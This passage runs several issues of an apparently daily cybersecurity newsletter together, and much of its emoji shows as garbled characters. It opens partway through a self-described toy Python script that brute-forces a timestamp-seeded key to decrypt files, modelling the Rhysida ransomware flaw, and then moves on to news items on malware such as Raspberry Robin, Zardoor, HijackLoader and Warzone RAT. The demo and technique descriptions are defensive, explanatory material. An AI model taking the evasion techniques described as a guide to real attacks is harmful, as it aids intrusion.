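brute-forces the seed from the file's timestamp and a known file header.

Added example, not Rhysida's scheme and not the researchers' tool. Rhysida
uses LibTomCrypt's ChaCha20-based generator; this toy uses a SHA-256 counter
stream so it runs with the standard library only. The document bytes and the
timestamps are constructed.
"""
import hashlib
import struct

ENCRYPTION_TIME = 1_708_012_800   # constructed: epoch seconds when the "ransomware" ran
KNOWN_HEADERS = (b"%PDF-", b"\x89PNG\r\n\x1a\n", b"PK\x03\x04")  # file magics used to verify a candidate


def keystream(seed: int, nbytes: int) -> bytes:
    """Deterministic byte stream from a 64-bit seed (SHA-256 in counter mode)."""
    out = bytearray()
    counter = 0
    while len(out) < nbytes:
        out += hashlib.sha256(struct.pack(">QQ", seed, counter)).digest()
        counter += 1
    return bytes(out[:nbytes])


def file_key_from_seed(seed: int) -> bytes:
    """The flaw being modelled: the per-file key is a function of a predictable seed."""
    return keystream(seed, 32)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    ks = keystream(int.from_bytes(key[:8], "big"), len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def encrypt(plaintext: bytes, run_time: int) -> bytes:
    return xor_with_key(plaintext, file_key_from_seed(run_time))


def decrypt(ciphertext: bytes, key: bytes) -> bytes:
    return xor_with_key(ciphertext, key)   # XOR stream cipher: decryption == encryption


def recover_key(ciphertext: bytes, time_estimate: int, window: int):
    """Try every seed within +/- window seconds of the estimate and keep the
    first one whose key turns the ciphertext head into a known file header.
    Returns (seed, key) or None if nothing in the window fits."""
    head = ciphertext[:8]
    for seed in range(time_estimate - window, time_estimate + window + 1):
        key = file_key_from_seed(seed)
        if decrypt(head, key).startswith(KNOWN_HEADERS):
            return seed, key
    return None


def demo():
    """Encrypt a constructed PDF, then recover it from the file timestamp alone."""
    document = b"%PDF-1.7\n% constructed sample document\n" + b"A" * 64
    ciphertext = encrypt(document, ENCRYPTION_TIME)
    observed_mtime = ENCRYPTION_TIME + 37         # file timestamp lands shortly after the run
    seed, key = recover_key(ciphertext, observed_mtime, window=3600)
    return seed, decrypt(ciphertext, key)


if __name__ == "__main__":
    seed, plaintext = demo()
    print(f"recovered seed {seed}, plaintext starts with {plaintext[:8]!r}")
```

A one-hour window is 7,201 candidate seeds and two hashes each, so recovery is instant; the real work in the Rhysida case was reversing exactly how the seed was derived and how the generator's output was consumed per file, which is what turns a known-weak design into a working decryptor. A generator seeded from the operating system's entropy source instead would leave no such shortcut.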

While the scope of these decryption efforts may be limited, they offer hope and valuable insights into combating ransomware threats. With continued research and collaboration, the cybersecurity community can continue to develop tools and strategies to mitigate the impact of ransomware attacks.

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


🚵 Wander: Find your happy place. Cue Happy Gilmore flashback 🏌️⛳🌈🕊️ Mmmm Happy Place… 😇 So, we’ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breathtaking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the land of the free and the home of the brave is news of rioting, looting and school shootings, it’s easy to forget how beautiful some parts of it are. The awe-inspiring locations, along with the innovative architecture of the hotels, set Wander apart from your run-of-the-mill American getaway 🏞️😍 (LINK)


🌊 Digital Ocean: If you build it, they will come. Nope, we’re not talking about a baseball field for ghosts ⚾👻🍿 (Great movie, to be fair 🙈). This is Digital Ocean, who’ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you’ll find yourself catching the buzz even if you can’t code (guilty 😑). But if you can, and you’re looking for somewhere to test things out, launch something new or simply enhance what you’ve got, we’d recommend checking out their services fo’ sho 😉 And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! 🌿 (LINK)

Do you CISA what we’re packing? 💀

🔒 Strengthening Open-Source Security: New Framework by CISA and OpenSSF 🔒

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has teamed up with the Open Source Security Foundation (OpenSSF) to introduce the Principles for Package Repository Security. 🛡️ This framework aims to enhance security in open-source software ecosystems by providing guidelines for package managers.

It outlines four security maturity levels, ranging from basic measures like multi-factor authentication to advanced protocols such as requiring MFA for all maintainers. 💻 The authors emphasise achieving at least Level 1 maturity for all package repositories.

This initiative responds to concerns raised by the U.S. Department of Health and Human Services about security risks in healthcare systems due to open-source software vulnerabilities. 👩‍⚕️🔐

By promoting collaboration and sharing best practices, the framework aims to safeguard critical software infrastructure and mitigate emerging cyber threats. 🌍🛡️💡

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3-min newsletter on what matters in AI; with all the new AI things coming to market, it’s good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20-year veteran 'Wealthy Primate' might be able to help you climb that tree 🐒🌴 with his stick and banana approach 🍌😁

  • Techspresso: Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, TechCrunch etc.)

Let us know what you think!

So long and thanks for reading all the phish!

Raspberry Robin malware spreading on Discord


Welcome to Gone Phishing, your daily cybersecurity newsletter that’s leaving the cybercriminals in the dust like Trump is Biden 🙈 Or maybe he’s just Biden his time 😁

Today’s hottest cybersecurity news stories:

  • โš ๏ธ Watch out for Raspberry Robin malware spreading Discord ๐Ÿค

  • 🕋 General Zardoor targets Islamic charity organisation via backdoor 🚪

  • ๐Ÿ€ I smell a Warzone RAT, DoJ ainโ€™t nothing to f*ck with, arrests made

Raspberry Robin, Rock, Rock, Raspberry Robin 🎶

๐Ÿ”’๐Ÿ–ฅ๏ธ Watch Out: Raspberry Robin Malware Gets Stealthier! ๐Ÿ›‘

Raspberry Robin, the notorious malware family known for facilitating initial access to other malicious payloads, has upped its game with two new one-day exploits for local privilege escalation. 😱 Check Point's recent report reveals that these exploits are used shortly after being developed, suggesting access to an exploit seller or rapid in-house development.

This evasive malware, attributed to the threat actor Storm-0856, has been on the radar since 2021 and is part of a complex malware ecosystem with ties to prominent e-crime groups like Evil Corp and Silence. 😡 It spreads through various vectors, including infected USB drives, acting as a gateway for ransomware and other threats.

What's alarming is Raspberry Robin's use of undisclosed exploits, like CVE-2023-36802, which was advertised on the dark web months before it was publicly disclosed and patched by Microsoft. 😨 These exploits are integrated quickly into the malware's arsenal, posing a significant threat to organisations that may not have applied patches.

To make matters worse, the malware now utilises rogue RAR archive files hosted on Discord to gain initial access and has tweaked its lateral movement and C2 communication methods for increased stealth. 🕵️‍♂️ This includes switching from PsExec.exe to PAExec.exe for lateral movement and dynamically selecting V3 onion addresses for C2 communication.

Incorporating these changes, Raspberry Robin continues to evolve, making it more challenging to detect and analyse. Vigilance and timely patching remain crucial in defending against such sophisticated threats! 🛡️

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Zardoor. The one place in Middle-earth we don't want to see any closer, and the one place we're trying to get to 🧙‍♂️

🚨🔒 Islamic Non-Profit in Saudi Arabia Targeted by Stealthy Cyber Espionage Campaign! 💻🔐

An unnamed Islamic non-profit organisation in Saudi Arabia has fallen victim to a sophisticated cyber espionage campaign, where threat actors deployed a previously undocumented backdoor named Zardoor. 😱 Discovered by Cisco Talos in May 2023, the campaign likely began as early as March 2021 and has flown under the radar, with only one known target identified so far.

Throughout the operation, the attackers utilised living-off-the-land binaries (LoLBins) to maintain long-term access to victim environments discreetly, avoiding detection. 🕵️‍♂️ The attack on the Islamic charity involved periodic data exfiltration, with the initial access vector still shrouded in mystery.

Zardoor, the stealthy backdoor deployed for persistence, is orchestrated using open-source reverse proxy tools like FRP, sSocks, and Venom to establish command-and-control connections. 🛡️ Leveraging Windows Management Instrumentation (WMI) for lateral movement, the threat actor spreads Zardoor across the network, executing commands received from the C2.

The infection pathway involves a dropper component that installs a malicious dynamic-link library ("oci.dll"), unleashing two backdoor modules, "zar32.dll" and "zor32.dll." While "zar32.dll" handles C2 communications, "zor32.dll" ensures administrator privileges for the backdoor. 😨 Zardoor's capabilities include data exfiltration, remote execution, IP address updates, and self-deletion.

Despite extensive analysis, the identity and motives of the threat actor remain unknown, with no discernible ties to known cybercriminal groups. 🕵️‍♀️ The sophistication and stealthiness of the operation indicate the work of an advanced threat actor, posing a significant challenge to detection and mitigation efforts.

Organisations must remain vigilant and bolster their cybersecurity defences against such stealthy and persistent threats! 🛡️🔐


Let me see your Warzone face 😡

๐Ÿ›‘โš ๏ธ U.S. Justice Department Seizes Online Infrastructure Selling Warzone RAT โš ๏ธ๐Ÿ›‘

In a significant move, the U.S. Justice Department (DoJ) has seized online infrastructure linked to the sale of a notorious remote access trojan (RAT) dubbed Warzone RAT. 🚨 The domains, including www.warzone[.]ws, were utilised to peddle this malicious software, allowing cybercriminals to clandestinely access and pilfer data from victims' computers.

In a coordinated international effort, law enforcement has apprehended and indicted two individuals in Malta and Nigeria for their roles in promoting and facilitating the use of the malware. 👮‍♂️👮‍♀️ Daniel Meli (27) and Prince Onyeoziri Odinakachi (31) face charges related to unauthorised access to protected computers, with Meli additionally accused of illegally vending electronic interception devices and conspiring to commit computer intrusion offences.

Meli, operating since 2012, has a history of providing malware services through online forums, including his previous sale of the Pegasus RAT. Odinakachi, on the other hand, provided customer support for Warzone RAT purchasers between June 2019 and March 2023.

Warzone RAT, also known as Ave Maria, operates under the malware-as-a-service (MaaS) model, enabling threat actors to steal information and remotely control infected hosts for further exploitation. 🕵️‍♂️ Sold for $38 a month, its functionalities include browsing victim file systems, capturing screenshots, recording keystrokes, stealing credentials, and activating webcams without consent.

The FBI, in collaboration with international partners, covertly acquired copies of Warzone RAT, confirming its malicious capabilities. 🕵️‍♀️ This joint effort involved authorities from Australia, Canada, Croatia, Finland, Germany, Japan, Malta, the Netherlands, Nigeria, Romania, and Europol.

The dismantling of the Warzone RAT infrastructure marks a significant victory in the ongoing battle against cybercrime, demonstrating the effectiveness of global cooperation in combating online threats. 🤝 Organizations are urged to remain vigilant and enhance their cybersecurity measures to safeguard against such malicious activities. 🛡️🔒

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

Google begins blocking, removing dodgy apps


Welcome to Gone Phishing, your daily cybersecurity newsletter that delves into the depths of cyber-hell for your benefit like Tucker #Carlson with Putin. Or is it the other way around with those two 🤷👀😂

It’s Friday, folks, which can only mean one thing… It’s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it.

Congrats, the cybercriminals are no match… for your patch! 🩹🩹🩹

Check out these freshly hatched patches 🐣🐣🐣

Google: These are the ‘Droid (patches!) you’re looking for 😁

🚨 Google Fixes Critical Remote Code Execution Flaw With Android 🤖

Google dropped the February 2024 Android security patches tackling 46 vulnerabilities, among them a serious code-execution flaw tracked as CVE-2024-0031 🛠️. This bug, nestled in the System component, bites Android Open Source Project (AOSP) versions 11, 12, 12L, 13, and 14 📱.

"Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin", according to Google's advisory, which also points to patches outside of AOSP. The most pressing issue, a critical security hole in the System component, could allow remote code execution without any extra privileges 🚨.

Google rolled out two sets of patches, dated February 1st and 5th, to address these concerns 📅. Splitting them this way lets partners focus on fixing a chunk of the vulnerabilities first, although Google suggests tackling all the issues listed in the bulletin. Users are encouraged to apply these patches pronto when they're available, keeping their devices shielded from potential exploits 🔒

Now, on to today’s hottest cybersecurity stories:

  • ๐Ÿ™…โ€โ™‚๏ธ Google begins blocking, removing dodgy apps in Singapore ๐Ÿœ

  • 🔬 Researchers decode HijackLoader malware despite evolution 🐒

  • 🤕 Das Facebook fatal accident scam down but not out. Wunderbar 🤦‍♂️

Google be like: ⛔ Blocked, ❌ Deleted 💅💁‍♀️💀

📱 Google Launches Fraud Protection Pilot in Singapore!

Google has rolled out a groundbreaking pilot program in Singapore aimed at curbing the abuse of Android app permissions. 🚫 The initiative targets apps that exploit sensitive permissions to read one-time passwords and harvest sensitive data for financial fraud.

Under this enhanced fraud protection, users attempting to sideload such apps from internet sources like web browsers, messaging apps, or file managers will be automatically blocked. 🛑 Google Play Protect will analyse the permissions requested by third-party apps in real time and prevent the installation of those seeking access to sensitive data.

"These permissions are frequently abused by fraudsters to intercept one-time passwords via SMS or notifications, as well as spy on-screen content," explained Eugene Liderman, Google's director of mobile security strategy. 👀

The move comes amidst a collaborative effort to combat mobile fraud, with Google urging app developers to adhere to best practices and review their apps' device permissions to align with Mobile Unwanted Software principles. 📲💡

Google's real-time scanning with Play Protect has already proven effective in detecting and blocking malicious apps, with over 515,000 new malicious apps detected and 3.1 million warnings issued in select markets.

Meanwhile, Apple has announced significant changes to the App Store in the European Union to comply with the Digital Markets Act. 🍏 These changes, including Notarization for iOS apps, aim to enhance privacy and security for users. However, Apple warns that distributing iOS apps from alternative sources could expose users to increased risks.

With both tech giants taking proactive measures to safeguard user privacy and security, the battle against mobile fraud continues to evolve. 🛡️💰 Yay! Some good news 🎉

Hijack! Bye Jack 👋👀😁

๐Ÿ” New HijackLoader Malware Variant Packs Stealthy Defense Evasion Tactics! ๐Ÿ›ก๏ธ

Threat actors behind the notorious HijackLoader malware have upped their game with new defence evasion techniques, making it stealthier and more challenging to detect. 💻

CrowdStrike researchers uncovered a novel approach where HijackLoader employs a standard process hollowing technique, triggered by the parent process writing to a pipe, enhancing its ability to evade detection. 🕵️‍♂️ This evolution marks a significant step forward in the malware's stealth capabilities.

Initially spotted by Zscaler ThreatLabz in September 2023, HijackLoader has since been a favoured tool for cybercriminal groups, facilitating the delivery of DanaBot, SystemBC, and RedLine Stealer. 🐺 Now, it's being wielded by TA544 to distribute Remcos RAT and SystemBC via phishing emails.

Liviu Arsene from CrowdStrike likened loaders to "wolves in sheep's clothing," emphasising their role in introducing and executing sophisticated threats. 🐺🐑 This latest variant of HijackLoader takes this deception to new heights, refining its digital camouflage for enhanced stealth.

The attack chain begins with the execution of "streaming_client.exe," which fetches a second-stage configuration from a remote server. Subsequent steps involve loading a legitimate DLL specified in the configuration and executing HijackLoader's payload using a combination of process doppelgänging and process hollowing techniques. 🔄🏭

Notably, the malware employs Heaven's Gate to bypass user-mode hooks, injecting shellcode into cmd.exe using transacted hollowing, a technique observed in malware like the Osiris banking trojan. ⚠️ This intricate evasion mechanism aims to fly under the radar of traditional security solutions, posing a significant challenge for threat researchers.

As adversaries continue to refine their tactics, the evolution of defence evasion capabilities in HijackLoader underscores the ongoing arms race between cybercriminals and security professionals. 🚀 Stay vigilant and keep evolving your defences!


Don’t fall Facebook, line, and sinker 😬😬😬

🚨 Watch Out for Fabled Facebook Fatal Accident Scam (now in German!) ⚠️

Facebook's battle against a persistent malvertising campaign has spilled over into the German language, with cybercriminals finding new ways to deceive users. 😱

The first scam involves a fake fundraiser post about a "Tödlicher Verkehrsunfall" (Deadly Traffic Accident), tugging at heartstrings with false claims of highway fatalities. 😡 This sneaky tactic prevents users from commenting, making it harder to warn others.

Upon investigation, it's revealed that compromised accounts are used to spread this scam, often accompanied by Messenger messages urging users to click suspicious links. 🕵️‍♂️ These links, despite appearing legitimate thanks to a "googleapis.com" domain, are actually used for phishing and tech support scams, analysing user data to tailor fraudulent activities.

In a similar vein, another scam featuring a California ambulance and motorcycle wreck masquerades as a German incident, complete with grammatical errors. 🚑❌ Users who try to access these scams from Germany are thwarted by VPN detection, highlighting the criminals' efforts to evade detection.

The malvertising campaign doesn't stop there; it also employs browser push notifications, leading users to explicit content, scam sites, and gambling platforms. 😤 These tactics are designed to lure unsuspecting victims into fraudulent schemes.

So, how can you protect yourself from falling victim to these scams? 🤔 First, be cautious of posts tagging multiple friends and promising videos. If your account is compromised, take immediate action: remove unknown Facebook apps, enable two-factor authentication, and change your password.

Vigilance is key to staying safe in the ever-evolving landscape of online threats! Another solution, of course, is to abstain from Facebook entirely. Delete your account, even. And all other social media… Hehe, enjoy your weekend folks and stay safe out there!! 🛡️🛡️🛡️

Peace out ✌️

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter
  • ๐ŸŒต CACTUS ransomware exploits flaws in Qlik Sense ๐Ÿ’ป

Tech giants and global coalition unite against spyware abuse


Welcome to Gone Phishing, your daily cybersecurity newsletter that floats like a butter-cy and stings like a cyber-bee 🐝😂🙃

Today’s hottest cybersecurity news stories:

  • 🤖 Tech giants and global coalition unite against spyware abuse 🕵️

  • ๐Ÿ‘จ๐Ÿพ Forget MaaS immigration, Maas is top threat to organisations ๐ŸŒ

  • ๐Ÿ‘จโ€โš•๏ธ Failed their HIPAAcratic oath! Medical Center Fined $4.75M ๐Ÿ’ฐ

CyberAvengers Unite 🦸✊💥

๐Ÿ›ก๏ธ Global Effort to Curb Spyware Abuse Unveiled! ๐Ÿค๐Ÿ’ผ

Countries like France, the U.K., and the U.S., joined by tech giants such as Google, Meta, and Microsoft, unite against commercial spyware misuse in the Pall Mall Process. Their aim? To rein in the proliferation of cyber intrusion tools and establish guidelines for responsible development and use.

โš ๏ธ The initiative warns of the dangers posed by spyware, which can infiltrate devices without user interaction, posing threats to privacy, human rights, and digital security. Thousands fall victim to spyware attacks yearly, with malicious actors exploiting vulnerabilities to gather sensitive information.

🌎 While the move highlights global cooperation, the absence of certain nations like Israel and Hungary raises questions. The action also coincides with the U.S. Department of State's visa denials for those linked to spyware misuse, signalling a broader crackdown.

๐Ÿ•ต๏ธ Commercial spyware, such as Chrysaor and Pegasus, designed for legitimate use, often ends up in the wrong hands, targeting journalists, activists, and dissidents. Despite efforts to contain the spyware ecosystem, the battle persists, with tech firms tracking numerous vendors and exploits.

Let's stay vigilant and work together to protect against cyber threats! 🚨🔒


Opiate of the MaaSes 🤓

๐Ÿ›ก๏ธ Darktrace Report: MaaS Reigns Supreme in 2023 Threat Landscape! ๐Ÿšจ๐Ÿ’ป

The 2023 End of Year Threat Report by Darktrace sounds the alarm on Malware-as-a-Service (MaaS) infections, emerging as the top threat to organisations in the latter half of the year.

Malware strains like ViperSoftX and Black Basta showcase a menacing trend of combining multiple functions, making detection a formidable challenge for defenders. 😱

๐Ÿ ViperSoftX, a notorious info stealer and RAT, evolved with sophisticated evasion tactics, targeting sensitive data such as crypto wallets and browser passwords. Meanwhile, Black Basta ransomware spreads alongside Qbot banking trojan for credential theft.

💰 The rise of Ransomware-as-a-Service (RaaS) in the wake of Hive ransomware's takedown spells trouble ahead. 📈 Darktrace predicts a surge in double and triple extortion tactics, fuelled by the expanding arsenal of multi-functional malware.

🤖 Moreover, attackers are leveraging AI to craft more convincing phishing campaigns, bypassing traditional security measures with alarming success rates. 🎣

As cyber threats grow in complexity, organisations face an uphill battle to stay protected. With MaaS and RaaS on the rise, the cybersecurity landscape remains fraught with challenges in 2024. 🛡️🔒


Yeah, but I gotta fake (medical) ID though… 🎶

🚨 HIPAA Violation: NYC Medical Center Fined $4.75M! 💸

Federal regulators have slapped Montefiore Medical Center with a hefty fine of $4.75 million following a data breach dating back to 2013. 😱 The settlement, announced by the U.S. Department of Health and Human Services' Office for Civil Rights (HHS OCR), stems from "data security failures" that allowed an insider to steal and sell patients' protected health information.

The breach went undetected for years until the New York Police Department uncovered evidence in 2015, prompting an internal investigation by Montefiore. It was revealed that an employee had stolen the electronic health records of thousands of patients and sold them to an identity theft ring. 😡

OCR's investigation found multiple HIPAA Security Rule violations, including failures to analyse and identify risks to PHI, monitor and safeguard health information systems, and implement proper policies and procedures for PHI protection. 🕵️‍♂️

"Unfortunately, we are living in a time where cyberattacks from malicious insiders are not uncommon," said HHS OCR Director Melanie Fontes Rainer, emphasising the critical need for robust cybersecurity measures in the healthcare sector. 💪

In addition to the financial penalty, Montefiore has agreed to implement a corrective action plan, including conducting a thorough security risk analysis, implementing audit controls, and providing comprehensive training on HIPAA rules for its workforce. 🛡️🔒

Montefiore, in response, highlighted its commitment to patient privacy and cybersecurity, emphasising the steps taken to enhance security protocols and reinforce staff training since the incident. 👩‍⚕️🔐

As healthcare systems remain prime targets for cyberattacks, Montefiore vows to remain vigilant in protecting patient information and upholding safety protocols. 🏥💻

Catch up tomorrow cyber squad 👍

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!